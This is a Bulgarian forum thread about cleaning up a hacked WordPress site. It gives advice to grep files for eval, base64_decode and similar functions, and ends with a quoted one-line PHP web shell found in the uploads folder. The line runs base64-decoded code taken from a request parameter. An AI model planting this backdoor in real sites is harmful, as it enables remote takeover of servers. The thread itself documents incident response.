Хакнат wordpres, добавя script таг в wp-admin/index.php

[ghost]

На един wordpres версия 3.3.2 с плугини SUPER CACHE, contact form7, all in one seo pack, share this, wp touch ми добавят през определено време script таг в началото на wp-admin/index.php и не мога да разбера от къде имат достъп...

Проверих htaccess-те, uploads фолдера не могат да exec php, смених паролите на ftp и admin-a, проверих базата за някакви скриптове и нищо.

Единственото което е възможно е да има shell скрипт някъде по сървъра но НЕ МОГА да го намеря ... четох access лога евентуално да видя нещо подозрително но не намерих.

Инсталирах плугина Sucuri Scanner и той казва, че всичко е идеално.

Някакви идеи какво мога да направя още?

 

[max]

От: Хакнат wordpres, добавя script таг в wp-admin/index.php

1. Свали си цялата инсталация.
2. Отвори всички файлове в Notepad++ или някой друг лек текстов редактор.
3. Търси във всички файлове за eval, base64_decode, gzinflate, exec, shell.
4. Прегледай внимателно кода в тези функции - не е задължително да са вируси, но доста често се използват за вкарване и изпълнение на зловреден код.
5. Копирай част от кода на скрипта, който ти се зарежда и му пусни търсене във всички файлове.

 

[ghost]

От: Хакнат wordpres, добавя script таг в wp-admin/index.php

Мерси, оказа се, че съм изпуснал файл на име wp-upload.php забит на вътре в uploads папката който имаше това

$_REQUEST[e] ? eVAl( base64_decode( $_REQUEST[e] ) ) : exit;